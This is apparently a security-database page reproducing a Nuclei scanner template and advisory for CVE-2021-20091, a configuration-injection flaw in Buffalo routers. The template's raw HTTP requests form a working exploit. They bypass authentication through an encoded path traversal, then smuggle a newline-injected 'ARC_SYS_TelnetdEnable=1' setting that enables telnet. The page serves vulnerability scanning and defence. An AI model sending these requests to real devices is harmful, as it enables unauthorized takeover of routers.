ProjectDiscovery NUCLEI:CVE-2021-20091
Aug 11, 2021 - 12:28 p.m.

Buffalo WSR-2533DHPL2 - Configuration File Injection

2021-08-11 12:28:20
ProjectDiscovery
github.com

CVSS3: 9.8 High
  Attack Vector: NETWORK
  Attack Complexity: LOW
  Privileges Required: NONE
  User Interaction: NONE
  Scope: UNCHANGED
  Confidentiality Impact: HIGH
  Integrity Impact: HIGH
  Availability Impact: HIGH
  Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score: 8.4 High (Confidence: Low)

CVSS2: 7.5 High
  Access Vector: NETWORK
  Access Complexity: LOW
  Authentication: NONE
  Confidentiality Impact: PARTIAL
  Integrity Impact: PARTIAL
  Availability Impact: PARTIAL
  Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

EPSS: 0.975 High (Percentile: 100.0%)

The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 do not properly sanitize user input. An authenticated remote attacker could leverage this vulnerability to alter device configuration, potentially leading to remote code execution.
id: CVE-2021-20091

info:
  name: Buffalo WSR-2533DHPL2 - Configuration File Injection
  author: gy741,pdteam,parth
  severity: high
  description: |
    The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 does not properly sanitize user input. An authenticated remote attacker could leverage this vulnerability to alter device configuration, potentially leading to remote code execution.
  impact: |
    An attacker can exploit this vulnerability to inject malicious configuration settings, potentially leading to unauthorized access or control of the router.
  remediation: |
    Apply the latest firmware update provided by Buffalo to fix the configuration file injection vulnerability.
  reference:
    - https://blogs.juniper.net/en-us/security/freshly-disclosed-vulnerability-cve-2021-20090-exploited-in-the-wild
    - https://www.tenable.com/security/research/tra-2021-13
    - https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2
    - https://nvd.nist.gov/vuln/detail/CVE-2021-20091
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2021-20091
    epss-score: 0.00928
    epss-percentile: 0.81222
    cpe: cpe:2.3:o:buffalo:wsr-2533dhpl2-bk_firmware:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: buffalo
    product: wsr-2533dhpl2-bk_firmware
  tags: cve2021,cve,buffalo,firmware,iot,tenable

http:
  - raw:
      - |
        GET /images/..%2finfo.html HTTP/1.1
        Host: {{Hostname}}
        Referer: {{BaseURL}}/info.html
      - |
        POST /images/..%2fapply_abstract.cgi HTTP/1.1
        Host: {{Hostname}}
        Referer: {{BaseURL}}/info.html
        Content-Type: application/x-www-form-urlencoded

        action=start_ping&httoken={{trimprefix(base64_decode(httoken), base64_decode("R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7"))}}&submit_button=ping.html&action_params=blink_time%3D5&ARC_ping_ipaddress=127.0.0.1%0AARC_SYS_TelnetdEnable=1&ARC_ping_status=0&TMP_Ping_Type=4

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - "/Success.htm"

      - type: status
        status:
          - 302

    extractors:
      - type: regex
        name: httoken
        group: 1
        regex:
          - 'base64\,(.*?)" border='
        internal: true
# digest: 4b0a00483046022100dd49a706de9b916f92684a08c80476589aa14b407bde15ee8a4cc56622060174022100d77abfdb0134802a565bbd5c593e458978e19bf0ff9973231988835c3199bfe8:922c64590222798bb761d5b6d8e72950